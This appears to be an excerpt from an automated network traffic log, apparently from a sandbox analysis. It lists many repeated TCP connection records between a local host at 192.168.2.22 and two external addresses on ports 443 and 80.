                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 87.121.86.105:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 142.215.209.77:443 -> 192.168.2.22:49162
